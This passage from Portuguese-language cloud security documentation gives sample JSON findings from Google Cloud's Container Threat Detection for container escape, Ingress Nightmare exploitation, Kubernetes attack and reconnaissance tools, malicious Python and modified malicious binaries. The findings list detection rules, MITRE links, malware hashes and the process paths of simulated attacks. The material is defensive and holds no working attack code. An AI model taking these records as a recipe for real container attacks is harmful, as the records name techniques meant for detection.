"google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_container_escape"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1611/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/21225e29b4225a4eca16996445e243fdab8051a0ad4bc232b907ef5e9b67f66b/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Execução: execução da vulnerabilidade Ingress Nightmare (pré-visualização)

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Ingress Nightmare Vulnerability Exploitation",     "chokepoint": {},     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2025-04-17T18:54:09Z"       }     ],     "createTime": "2025-04-17T18:54:14.136Z",     "database": {},     "dataProtectionKeyGovernance": {},     "eventTime": "2025-04-17T18:54:13.952Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-04-17T18:54:09Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-04-17T18:54:09.924746656Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "SHARED_MODULES"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/tmp/nginx\"",           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"/tmp/nginx\"",           "\"/proc/1/fd/1\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-ingress-nightmare-2025-04-17-18-54-06-utc\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"SHLVL\"",             "val": "\"0\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"_\"",             "val": "\"/tmp/nginx\""           }         ],         "pid": "1",         "parentPid": "0"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "MEDIUM",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_ingress_nightmare_vulnerability_exploitation"     },     "detectionPriority": "MEDIUM",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1744916049",             "nanos": 924746656           }         }       }     ],     "properties": {},     "findingId": "b19bf4b85b504a5da1a64cdadd4c8194",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0002/"       },       "relatedFindingUri": {}     }   } }     

Execução: execução da ferramenta de ataque do Kubernetes

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Kubernetes Attack Tool Execution",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "1970-01-01T00:00:00Z"       }     ],     "createTime": "2024-10-21T19:08:35.255Z",     "database": {},     "eventTime": "2024-10-21T19:08:35.091Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "1970-01-01T00:00:00Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2024-10-21T19:07:41.503072537Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "RESOURCE_DEVELOPMENT",       "primaryTechniques": [         "OBTAIN_CAPABILITIES"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-kubernetes-attack-suspicious-tool-864dfecdc8d5f5d4\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "SEVERITY_UNSPECIFIED",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_kubernetes_attack_tool_execution"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1588/002/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/21225e29b4225a4eca16996445e243fdab8051a0ad4bc232b907ef5e9b67f66b/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Execução: execução da ferramenta de reconhecimento local

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Local Reconnaissance Tool Execution",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "1970-01-01T00:00:00Z"       }     ],     "createTime": "2024-10-21T19:08:35.255Z",     "database": {},     "eventTime": "2024-10-21T19:08:35.091Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "1970-01-01T00:00:00Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2024-10-21T19:07:41.503072537Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "RECONNAISSANCE",       "primaryTechniques": [         "ACTIVE_SCANNING"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-local-reconn-suspicious-tool-90e2e63d67bbc483\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "SEVERITY_UNSPECIFIED",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_local_reconnaissance_tool_execution"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1595/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/21225e29b4225a4eca16996445e243fdab8051a0ad4bc232b907ef5e9b67f66b/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Execução: Python malicioso executado

{   "finding": {     "canonicalName": "projects/PROJECT_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",     "category": "Execution: Malicious Python Executed",     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2024-06-17T18:50:15.454Z",     "description": "A machine learning model using Natural Language Processing  techniques identified an executed python script as malicious.",     "eventTime": "2024-06-17T18:50:15.217Z",     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2024-06-17T18:50:13Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "COMMAND_AND_SCRIPTING_INTERPRETER",         "PYTHON"       ],       "additionalTactics": [         "COMMAND_AND_CONTROL"       ],       "additionalTechniques": [         "INGRESS_TOOL_TRANSFER"       ]     },     "mute": "UNDEFINED",     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "3492656",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "3492656",           "partiallyHashed": false,         },         "script": {           "path": "FILENAME",           "size": "4191",           "sha256": "SHA_256",           "hashedSize": "4096",           "partiallyHashed": true,           "contents": "\"#!/usr/bin/env python\\n\\nimport uuid\\nimport subprocess\\nimport os\\nimport sys\\nsys.exit(0)…",         },         "args": [           "INTERPRETER",           "FILENAME"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"HOSTNAME\"",             "val": "\"CONTAINER_NAME\""           },         ],         "pid": "7",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "severity": "CRITICAL",     "state": "ACTIVE",   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "Process_Arguments": [       "INTERPRETER",       "FILENAME"     ],     "VM_Instance_Name": "INSTANCE_ID",     "Process_Binary_Fullpath": {         "primitiveDataType": "STRING"       },     "description": "A machine learning model using Natural Language Processing techniques identified an executed python script as malicious.",     "Container_Creation_Timestamp": {       "seconds": 1718650213,       "nanos": 0     },     "Pod_Name": "CONTAINER_NAME",     "Container_Image_Uri": "CONTAINER_IMAGE_URI",     "Container_Image_Id": "CONTAINER_IMAGE_ID",     "Parent_Pid": 1,     "Container_Name": "CONTAINER_NAME",     "Pid": 7,     "Process_Creation_Timestamp": {       "seconds": 1718650213,       "nanos": 762524370     },     "Environment_Variables": [     ],     "Pod_Namespace": "default"   } }    

Execução: ficheiro binário malicioso modificado executado

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"     "category": "Execution: Modified Malicious Binary Executed",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_URI",         "imageId": "CONTAINER_IMAGE_ID"       }     ],     "createTime": "2023-11-13T21:38:51.893Z",     "database": {},     "eventTime": "2023-11-13T21:38:51.525Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "default",           "containers": [                 {                   "name": "CONTAINER_NAME",                   "uri": "CONTAINER_URI",                   "imageId": CONTAINER_IMAGE_ID"                 }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"         }       ]     },     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "NATIVE_API"       ]     },     "mute": "UNDEFINED",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/malicious_files/file_to_be_modified\"",           "size": "68",           "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",           "hashedSize": "68",           "partiallyHashed": false         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false         },         "args": [           "\"/malicious_files/file_to_be_modified\"",           "\"modified-malicious-binary-da2a7b72e6008bc3\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://10.77.124.129:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-modified-malicious-binary\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"10.77.124.129\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"DEBIAN_FRONTEND\"",             "val": "\"noninteractive\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://10.77.124.129:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"10.77.124.129\""           },           {             "name": "\"PWD\"",             "val": "\"/malicious_files\""           }         ],         "pid": "8",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "display_name": "CLUSTER_ID",     "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "project_display_name": "PROJECT_ID",     "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parent_display_name": "PROJECT_ID",     "type": "google.container.Cluster",     "folders": []   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "modified_malicious_binary_executed"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1699905066",             "nanos": 618571329           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1106/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal IP Link",           "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"         }       ],       "cloudLoggingQueryUri": [         {           "displayName": "Cloud Logging Query Link",           "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"         }       ],       "relatedFindingUri": {}     }   } }   

Execução: biblioteca maliciosa modificada carregada

